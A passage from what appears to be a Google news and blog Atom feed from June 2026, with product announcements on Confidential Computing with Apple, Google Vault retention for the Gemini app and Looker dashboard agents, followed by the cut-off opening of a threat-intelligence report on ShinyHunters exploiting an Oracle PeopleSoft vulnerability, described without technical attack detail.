&lt;p&gt;The ability to &lt;a href="https://docs.cloud.google.com/policy-intelligence/docs/remediate-requests"&gt;remediate access
issues&lt;/a&gt; with Policy Troubleshooter
is &lt;a href="https://cloud.google.com/products#product-launch-stages"&gt;generally
available&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Sensitive Data Protection&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;Added support for inspecting and de-identifying batched content. You can now include a &lt;code&gt;&lt;a href="https://cloud.google.com/sensitive-data-protection/docs/reference/rest/v2/ContentItem#BatchContentItem"&gt;BatchContentItem&lt;/a&gt;&lt;/code&gt; in your &lt;code&gt;&lt;a href="https://cloud.google.com/sensitive-data-protection/docs/reference/rest/v2/ContentItem"&gt;ContentItem&lt;/a&gt;&lt;/code&gt; requests.&lt;/p&gt;</content>
    <link href="https://docs.cloud.google.com/release-notes#June_12_2026" rel="alternate"/>
    <category term="Cloud Release Notes"/>
    <published>2026-06-12T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/innovation-and-ai/infrastructure-and-cloud/global-network/virginia-community-investments/</id>
    <title>Our new community investments in Virginia support local jobs and expand energy affordability.</title>
    <updated>2026-06-11T20:00:00+00:00</updated>
    <content type="html">&lt;img src="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/VirginiaSocial.max-600x600.format-webp.webp" /&gt;We’re helping build the state’s next-generation workforce and investing in energy programs.</content>
    <link href="https://blog.google/innovation-and-ai/infrastructure-and-cloud/global-network/virginia-community-investments/" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-11T20:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/identity-security/powering-the-next-era-of-confidential-ai/</id>
    <title>Powering the next era of Confidential AI</title>
    <updated>2026-06-11T19:30:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph"&gt;&lt;p&gt;At Google Cloud, we’re committed to providing the most advanced, secure, and private infrastructure for the most demanding AI workloads, and partnering with a broad and diverse range of organizations to help them meet their AI workload needs.&lt;/p&gt;&lt;p&gt;We are thrilled to collaborate with Apple on its expanded &lt;a href="https://security.apple.com/blog/expanding-pcc/" target="_blank"&gt;Private Cloud Compute&lt;/a&gt; (PCC) systems announced this week at WWDC 2026. Working closely together, Apple and Google have built a serving platform on Google Cloud that meets the rigorous security, confidentiality, and transparency goals that Apple has for PCC. This achievement is a testament to the strong collaboration between our teams, as well as with Intel and NVIDIA.&lt;/p&gt;&lt;h3&gt;&lt;b&gt;Our commitment to privacy with Confidential Computing&lt;/b&gt;&lt;/h3&gt;&lt;p&gt;Our collaboration with Apple is built on a foundation of deep commitment to privacy that leverages Google Cloud's security and privacy technologies. At the heart of this collaboration is our Confidential Computing portfolio and our Titanium security architecture.&lt;/p&gt;&lt;p&gt;&lt;a href="https://docs.cloud.google.com/docs/security/titanium-hardware-security-architecture"&gt;Titanium&lt;/a&gt; architecture, featuring our custom-designed &lt;a href="https://docs.cloud.google.com/docs/security/titan-hardware-chip"&gt;Titan chip&lt;/a&gt;, provides a hardware root of trust that underpins the security and integrity of Google's infrastructure and services. &lt;a href="https://cloud.google.com/security/products/confidential-computing"&gt;Confidential Computing&lt;/a&gt; builds on this secure foundation by helping ensure data is protected throughout the lifecycle, encrypted at rest, in transit, and crucially in use within hardware-based Trusted Execution Environments (TEEs).&lt;/p&gt;&lt;p&gt;By protecting data in use, Confidential Computing becomes a fundamental and foundational element for &lt;a href="https://cloud.google.com/blog/products/identity-security/how-confidential-computing-lays-the-foundation-for-trusted-ai"&gt;building trust in AI systems&lt;/a&gt;, providing verifiable integrity and isolation for sensitive workloads. Confidential Computing helps prevent unauthorized access because data remains encrypted and isolated.&lt;/p&gt;&lt;h3&gt;&lt;b&gt;Enabling Apple Private Cloud Compute on Google Cloud&lt;/b&gt;&lt;/h3&gt;&lt;p&gt;We are proud to collaborate with Apple to extend the privacy and security properties of PCC infrastructure to Google Cloud. Our platform supports Apple’s PCC privacy commitments with a layered security approach built upon Google Cloud’s infrastructure, including:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Google Cloud Confidential Computing&lt;/b&gt;: Our core Confidential Computing platform provides the hardware-based TEEs necessary for PCC. By leveraging Intel TDX (Trust Domain Extensions) and &lt;a href="https://www.nvidia.com/en-us/data-center/solutions/confidential-computing/" target="_blank"&gt;NVIDIA Confidential Computing&lt;/a&gt;, we provide hardware-based isolation for virtual machines, designed to create a highly secure and private environment where workloads can run with cryptographic assurances.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Google Titanium security architecture and Titan chip&lt;/b&gt;: Google Titan chips are a key component in powering security and transparency posture for PCC infrastructure on Google Cloud. Deployed across our fleet, Titan establishes a strong hardware root of trust, helping to ensure the integrity of the boot process and the hardware platform itself.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Intel TDX and NVIDIA Confidential Computing&lt;/b&gt;: Google Cloud leverages the security features on Intel CPUs and &lt;a href="https://www.nvidia.com/en-us/data-center/technologies/blackwell-architecture/" target="_blank"&gt;NVIDIA Blackwell GPUs&lt;/a&gt; to protect data-in-use during high-performance AI inference, helping ensure that the entire compute path – from CPU to GPU – is protected.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Open-source transparency:&lt;/b&gt; With our commitment to verifiable security, Apple and Google have collaborated in engineering an open-source host stack specifically to support PCC's transparency, enabling independent inspection and verification of the system's security properties.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Together, these technologies help ensure that Apple PCC on Google Cloud meets requirements with enforceable protections, no privileged runtime access, and verifiable transparency.&lt;/p&gt;&lt;h3&gt;&lt;b&gt;Building the future of private AI infrastructure&lt;/b&gt;&lt;/h3&gt;&lt;p&gt;Our collaboration with Apple represents a significant milestone in further strengthening a secure cloud for AI by building on technologies and standards from Apple, Google Cloud, Intel, and NVIDIA. By ensuring that every layer of the stack — both hardware and software — contributes to a verifiable and secure system, we’ve created an advanced platform that is designed to uphold the stringent standards of user privacy and data security that PCC architecture demands.&lt;/p&gt;&lt;p&gt;The advancements built through this collaboration will benefit all Google Cloud customers. We are committed to continuous improvement and offering more transparent, secure, resilient platforms for all types of workloads, especially those handling AI and sensitive data.&lt;/p&gt;&lt;p&gt;You can learn more about &lt;a href="https://cloud.google.com/security/products/confidential-computing"&gt;Confidential Computing here&lt;/a&gt;.&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/identity-security/powering-the-next-era-of-confidential-ai/" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-11T19:30:00+00:00</published>
  </entry>
  <entry>
    <id>https://workspaceupdates.googleblog.com/2026/06/google-vault-now-supports-retention-rules-and-litigation-holds-for-Gemini-app.html</id>
    <title>Google Vault now supports retention rules and litigation holds for Gemini app</title>
    <updated>2026-06-11T18:10:23+00:00</updated>
    <content type="html">Google Vault now supports retention rules and litigation holds for the Gemini app on web and mobile. Previously, administrators were able to use Vault to search Gemini app conversations and export those search results. With this update, administrators can now also create, update, and delete the following for the Gemini app:&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Default retention rules:&lt;/b&gt; Set default retention rules for the Gemini app for a finite or indefinite retention period.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Custom retention rules:&lt;/b&gt; Create custom retention rules for the Gemini app by organizational unit (OU) or the entire domain for a finite or indefinite retention period.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Litigation holds:&lt;/b&gt; Place holds on the Gemini app data for a specific OU or a list of users.&lt;/li&gt;&lt;/ul&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHQn6Ug0AAmXUNouX4t32lUHtfaONrEpg7eOIMd0Zb4HDd9JPmxgnM0IWHqZNQpHMIFvRHi5aiPQTCLsKp7GGiuOgsMAFIYZxgoskJkMTehM88TJt8S-poBKAKJPLTqGu63JvOtWgdhvNAw4v0Y9tnE4lv_bknF0_CC0jGWdRV6wgXgw9dpDQ7wSEH980/s2048/Google%20Vault%20now%20supports%20retention%20rules%20and%20litigation%20holds%20for%20Gemini%20app%20-%206407.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHQn6Ug0AAmXUNouX4t32lUHtfaONrEpg7eOIMd0Zb4HDd9JPmxgnM0IWHqZNQpHMIFvRHi5aiPQTCLsKp7GGiuOgsMAFIYZxgoskJkMTehM88TJt8S-poBKAKJPLTqGu63JvOtWgdhvNAw4v0Y9tnE4lv_bknF0_CC0jGWdRV6wgXgw9dpDQ7wSEH980/s16000/Google%20Vault%20now%20supports%20retention%20rules%20and%20litigation%20holds%20for%20Gemini%20app%20-%206407.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;a href="https://workspace.google.com/products/vault/" target="_blank"&gt;Google Vault&lt;/a&gt; is an eDiscovery and information governance tool for Google Workspace that enables customers to retain, hold, search, and export users’ Google Workspace data. With this update, customers can expand their regulatory and legal eDiscovery management to include retention and holds for the Gemini app, making it easier to comply with data obligations from a central tool.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;Additional details&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Application scope: &lt;/b&gt;This update applies specifically to the Gemini app (on web and mobile) and is not applicable to Gemini in Google Workspace features integrated into other apps (such as "Help me write" in Gmail or Docs), as those specific interactions are not retained in the same manner.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Policy precedence: &lt;/b&gt;Vault retention rules and holds will always take precedence over Admin console settings, user deletion settings, or user activity settings.&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;i&gt;Example: &lt;/i&gt;If a user deletes a conversation or turns off their activity setting, but an active Vault hold requires retention, the data is hidden from the user but remains fully retained and visible to Vault administrators.&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;API support: &lt;/b&gt;Support for Vault API users will be available in the coming weeks.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Getting started&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Admins:&lt;/b&gt; Visit the Help Center to learn more about &lt;a href="https://support.google.com/vault/answer/15695746" target="_blank"&gt;using Vault to search the Gemini app&lt;/a&gt;, as well as &lt;a href="https://support.google.com/vault/answer/6127699" target="_blank"&gt;supported services and data types&lt;/a&gt;. If active, Vault retention rules and holds will take precedence over any other Admin Console setting or user setting.&lt;/li&gt;&lt;li&gt;&lt;b&gt;End users:&lt;/b&gt; There is no end-user setting for this feature.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Rollout pace&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid and Scheduled Release domains:&lt;/a&gt; Available now&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Availability&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Business: &lt;/b&gt;Business Plus&lt;/li&gt;&lt;li&gt;&lt;b&gt;Other Editions:&lt;/b&gt; Frontline Standard and Plus; Enterprise Essentials Plus&lt;/li&gt;&lt;li&gt;&lt;b&gt;Enterprise:&lt;/b&gt; Enterprise Standard and Plus&lt;/li&gt;&lt;li&gt;&lt;b&gt;Education:&lt;/b&gt; Education Fundamentals, Standard and Plus&lt;/li&gt;&lt;li&gt;&lt;b&gt;Other Add-ons:&lt;/b&gt; Vault&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Resources&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Google Workspace Updates: &lt;a href="https://workspaceupdates.googleblog.com/2025/02/google-vault-now-supports-gemini.html" target="_blank"&gt;Google Vault now supports the Gemini app&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Google Workspace Updates: &lt;a href="https://workspaceupdates.googleblog.com/2025/05/google-vault-gemini-support-for-all-google-workspace-for-education-customers.html" target="_blank"&gt;Gemini app reporting now available for all Google Workspace for Education customers&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Google Vault Help: &lt;a href="https://support.google.com/vault/answer/6127699?hl=en#Gemini&amp;amp;zippy=%2Csupported-gemini-app-data" target="_blank"&gt;Supported services &amp;amp; data types&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Google Vault Help: &lt;a href="https://support.google.com/vault/answer/15695746" target="_blank"&gt;Use Vault to search Gemini app&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;</content>
    <link href="https://workspaceupdates.googleblog.com/2026/06/google-vault-now-supports-retention-rules-and-litigation-holds-for-Gemini-app.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-06-11T18:10:23+00:00</published>
  </entry>
  <entry>
    <id>http://workspaceupdates.googleblog.com/2026/06/google-vault-now-supports-retention-rules-and-litigation-holds-for-Gemini-app.html</id>
    <title>Google Vault now supports retention rules and litigation holds for Gemini app</title>
    <updated>2026-06-11T18:10:23+00:00</updated>
    <content type="html">Google Vault now supports retention rules and litigation holds for the Gemini app on web and mobile. Previously, administrators were able to use Vault to search Gemini app conversations and export those search results. With this update, administrators can now also create, update, and delete the following for the Gemini app:&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Default retention rules:&lt;/b&gt; Set default retention rules for the Gemini app for a finite or indefinite retention period.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Custom retention rules:&lt;/b&gt; Create custom retention rules for the Gemini app by organizational unit (OU) or the entire domain for a finite or indefinite retention period.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Litigation holds:&lt;/b&gt; Place holds on the Gemini app data for a specific OU or a list of users.&lt;/li&gt;&lt;/ul&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHQn6Ug0AAmXUNouX4t32lUHtfaONrEpg7eOIMd0Zb4HDd9JPmxgnM0IWHqZNQpHMIFvRHi5aiPQTCLsKp7GGiuOgsMAFIYZxgoskJkMTehM88TJt8S-poBKAKJPLTqGu63JvOtWgdhvNAw4v0Y9tnE4lv_bknF0_CC0jGWdRV6wgXgw9dpDQ7wSEH980/s2048/Google%20Vault%20now%20supports%20retention%20rules%20and%20litigation%20holds%20for%20Gemini%20app%20-%206407.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHQn6Ug0AAmXUNouX4t32lUHtfaONrEpg7eOIMd0Zb4HDd9JPmxgnM0IWHqZNQpHMIFvRHi5aiPQTCLsKp7GGiuOgsMAFIYZxgoskJkMTehM88TJt8S-poBKAKJPLTqGu63JvOtWgdhvNAw4v0Y9tnE4lv_bknF0_CC0jGWdRV6wgXgw9dpDQ7wSEH980/s16000/Google%20Vault%20now%20supports%20retention%20rules%20and%20litigation%20holds%20for%20Gemini%20app%20-%206407.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;a href="https://workspace.google.com/products/vault/" target="_blank"&gt;Google Vault&lt;/a&gt; is an eDiscovery and information governance tool for Google Workspace that enables customers to retain, hold, search, and export users’ Google Workspace data. With this update, customers can expand their regulatory and legal eDiscovery management to include retention and holds for the Gemini app, making it easier to comply with data obligations from a central tool.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;Additional details&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Application scope: &lt;/b&gt;This update applies specifically to the Gemini app (on web and mobile) and is not applicable to Gemini in Google Workspace features integrated into other apps (such as "Help me write" in Gmail or Docs), as those specific interactions are not retained in the same manner.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Policy precedence: &lt;/b&gt;Vault retention rules and holds will always take precedence over Admin console settings, user deletion settings, or user activity settings.&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;i&gt;Example: &lt;/i&gt;If a user deletes a conversation or turns off their activity setting, but an active Vault hold requires retention, the data is hidden from the user but remains fully retained and visible to Vault administrators.&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;API support: &lt;/b&gt;Support for Vault API users will be available in the coming weeks.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Getting started&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Admins:&lt;/b&gt; Visit the Help Center to learn more about &lt;a href="https://support.google.com/vault/answer/15695746" target="_blank"&gt;using Vault to search the Gemini app&lt;/a&gt;, as well as &lt;a href="https://support.google.com/vault/answer/6127699" target="_blank"&gt;supported services and data types&lt;/a&gt;. If active, Vault retention rules and holds will take precedence over any other Admin Console setting or user setting.&lt;/li&gt;&lt;li&gt;&lt;b&gt;End users:&lt;/b&gt; There is no end-user setting for this feature.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Rollout pace&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid and Scheduled Release domains:&lt;/a&gt; Available now&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Availability&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Business: &lt;/b&gt;Business Plus&lt;/li&gt;&lt;li&gt;&lt;b&gt;Other Editions:&lt;/b&gt; Frontline Standard and Plus; Enterprise Essentials Plus&lt;/li&gt;&lt;li&gt;&lt;b&gt;Enterprise:&lt;/b&gt; Enterprise Standard and Plus&lt;/li&gt;&lt;li&gt;&lt;b&gt;Education:&lt;/b&gt; Education Fundamentals, Standard and Plus&lt;/li&gt;&lt;li&gt;&lt;b&gt;Other Add-ons:&lt;/b&gt; Vault&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Resources&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Google Workspace Updates: &lt;a href="https://workspaceupdates.googleblog.com/2025/02/google-vault-now-supports-gemini.html" target="_blank"&gt;Google Vault now supports the Gemini app&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Google Workspace Updates: &lt;a href="https://workspaceupdates.googleblog.com/2025/05/google-vault-gemini-support-for-all-google-workspace-for-education-customers.html" target="_blank"&gt;Gemini app reporting now available for all Google Workspace for Education customers&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Google Vault Help: &lt;a href="https://support.google.com/vault/answer/6127699?hl=en#Gemini&amp;amp;zippy=%2Csupported-gemini-app-data" target="_blank"&gt;Supported services &amp;amp; data types&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Google Vault Help: &lt;a href="https://support.google.com/vault/answer/15695746" target="_blank"&gt;Use Vault to search Gemini app&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;</content>
    <link href="http://workspaceupdates.googleblog.com/2026/06/google-vault-now-supports-retention-rules-and-litigation-holds-for-Gemini-app.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-06-11T18:10:23+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/business-intelligence/dashboard-agents-in-looker/</id>
    <title>Transform dashboards into interactive data experiences with Looker agents</title>
    <updated>2026-06-11T16:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Dashboards have long served as a primary way for organizations to extract insights from data, but they can fall short in agile environments: Dashboards aren’t interactive and don’t allow you to ask follow-up questions. This forces users to step outside their workflows or turn to data analysts to get the answers they need. Today, we are introducing Looker dashboard agents in preview, embedding intelligent, conversational data agents directly within dashboards and empowering users to explore their business intelligence (BI) data using natural language.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="1" src="https://storage.googleapis.com/gweb-cloudblog-publish/original_images/1_KG6gpf2.gif" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Start a conversation with a Looker dashboard agent&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Interactive agent-led investigations&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Traditionally, dashboards have presented a static view of data. With dashboard agents in Looker, users can explore their data directly within the dashboard interface. Users can start a conversation by clicking the Gemini icon and asking natural-language questions to receive contextual insights.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The accuracy of a data agent depends on the business context it is provided, and its ability to map appropriate metrics and dimensions to users’ inquiries. The Looker dashboard agent has direct context about the user’s applied filters, cross-filters, and pre-curated tiles, helping it to generate highly relevant and accurate answers to complex business questions.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Should a query require more data, the agent can access underlying &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/looker/docs/creating-and-editing-explores"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Explores&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to uncover additional information. These insights are paired with relevant charts and natural language explanations to simplify data exploration.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="2" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/2_kUvlGxK.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Explore data beyond dashboard to uncover deeper insights&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Tailor the agent to your business &lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Data analysts curate dashboards to provide business users with precise perspectives on organizational data. To maintain this kind of consistent and reliable analytical environment, the Looker dashboard agent is highly configurable. Analysts can add context on top of the Looker semantic layer by providing natural-language instructions directly to the agent. This way, they can define exactly how the agent interprets unique business logic and tailors responses for the target audience. By enabling self-serve data analysis, dashboard agents help analyst teams scale to meet the increasing data demands of the business.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="3" src="https://storage.googleapis.com/gweb-cloudblog-publish/original_images/3_t5v8e7A.gif" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Configure Looker dashboard agents&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Inherited trust and transparency &lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;For users to adopt an AI-based system, they must&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; trust the information it provides them. When generating an insight, the Looker dashboard agent explicitly shows its work by displaying intermediate reasoning, referenced dashboard tiles, and applied filters. Additionally, the administrator needs to trust users only have access to data and insights to which they are authorized. The dashboard agent is backed by Looker’s governance model, managed through standard permissions.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We are actively working on additional capabilities for the Looker dashboard agent, including support for iframe embedding, allowing organizations to bring dashboard agents alongside Looker dashboards into any essential portal or application.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Enable dashboard agents today&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;With Looker version 26.08.11 and later, administrators can activate the dashboard agent capability by toggling "Enable Chat with Dashboard" within the Gemini in Looker settings. Once enabled, authorized users will see the Gemini icon and can begin chatting with their dashboard data immediately. Please &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/looker/docs/conversational-analytics-looker-data-agents-dashboards"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;explore our support documentation&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; for more detailed information.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/business-intelligence/dashboard-agents-in-looker/" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-11T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/products/ads-commerce/new-real-estate-ads-formats/</id>
    <title>Enhanced Local Services Ads for Home Listings bring homebuyers and local agents together.</title>
    <updated>2026-06-11T15:00:00+00:00</updated>
    <content type="html">&lt;img src="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/bring_homebuyers_and_local_agen.max-600x600.format-webp.webp" /&gt;When buyers search for homes, they get critical property details — and they can contact an agent right from the ad.</content>
    <link href="https://blog.google/products/ads-commerce/new-real-estate-ads-formats/" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-11T15:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/topics/threat-intelligence/shinyhunters-targets-education-sector-oracle-exploit/</id>
    <title>ShinyHunters Targets Education Sector with Oracle PeopleSoft Exploit</title>
    <updated>2026-06-11T14:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Introduction&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Mandiant and Google Threat Intelligence Group (GTIG) have identified an active compromise and extortion campaign attributed to UNC6240 (ShinyHunters) targeting Oracle PeopleSoft application infrastructure. The activity was observed between May 27, 2026, and June 9, 2026 and is consistent with the exploitation of &lt;/span&gt;&lt;a href="https://www.oracle.com/security-alerts/alert-cve-2026-35273.html" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;CVE-2026-35273&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, a critical remote code execution vulnerability (CVSS 9.8) in the Environment Management component. The exploitation of this vulnerability directly aligns with the observed targeting of Environment Management Hub (PSEMHUB) endpoints. Because this activity predates Oracle's June 10, 2026 advisory, the vulnerability was exploited as a zero-day.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Upon becoming aware of active scanning and exploitation, we initiated notifications to over 100 global organizations whose IP addresses correlated with potentially vulnerable endpoints. Most of these organizations were based in the United States, and 68 percent operated within the higher education sector. Subsequently, public reports by @nahamike01 on X highlighted open attacker directories on the staging servers, allowing GTIG to perform a detailed triage of the threat actor's operations. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The attacker staging environments hosted customized MeshCentral agents masquerading as legitimate cloud endpoints, which they used to run administrative command queries and deploy a custom lateral movement and defacement script, &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;[victim_abbreviation]_fanout.sh&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;. This campaign directly correlates with subsequent data leaks of stolen organization data published on the ShinyHunters Data Leak Site (DLS) on June 9, 2026. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We recommend that organizations running Oracle PeopleSoft take the following immediate actions to best defend themselves. Additional remediation and hardening guidance is included later in this post.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-aside"&gt;&lt;dl&gt;
    &lt;dt&gt;aside_block&lt;/dt&gt;
